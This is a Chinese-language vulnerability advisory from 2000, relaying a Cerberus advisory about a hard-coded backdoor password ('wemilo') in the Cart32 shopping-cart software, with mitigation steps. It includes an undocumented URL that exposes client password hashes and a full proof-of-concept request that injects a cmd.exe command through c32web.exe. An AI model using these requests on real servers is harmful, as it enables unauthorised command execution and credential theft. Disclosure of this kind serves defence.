Cart32存在后门密码发布时间:2000-04-28 更新时间:2000-04-28 严重程度:中 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 Misc详细描述 Cerberus Information Security Advisory (CISADV000427)安全公告: 在任何使用基于WIN32平台并使用cart32 V3.0和V2.6的WEB服务器存在 密码后门。在cart32.exe中存在一个叫"wemilo"的密码(发现于0x6204h 偏移量处)。知道此密码的攻击者可以利用其中没有公开的URL方式如: http://charon/scripts/cart32.exe/cart32clientlist来获得一些 cart32客户端的密码。虽然这些密码是用hash加密,但还是可以使用, 如攻击者可以在精心编制的URL中嵌入这些hash密码并来以WEB SERVER 的身份来执行任意命令: 测试代码 http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab &SaveTab=Cart32%2B&Client=foobar &ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabT oSave=Cart32%2B&PlusTabToSave= Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile .txt 上面的URL会设置cart的属性并衍生一个SHELL,并执行目录列表操作和在C:下导出一个叫file.txt文件。 解决方案 1,使用UltraEdit来编辑cart32.exe文件,并改变"wemilo" 密码。 2,因为c32web.exe是cart32的管理程序,只有系统管理员才需要访问它。 所以对此程序做适当的NTFS权限限制来控制其他用户的访问。 相关信息 |
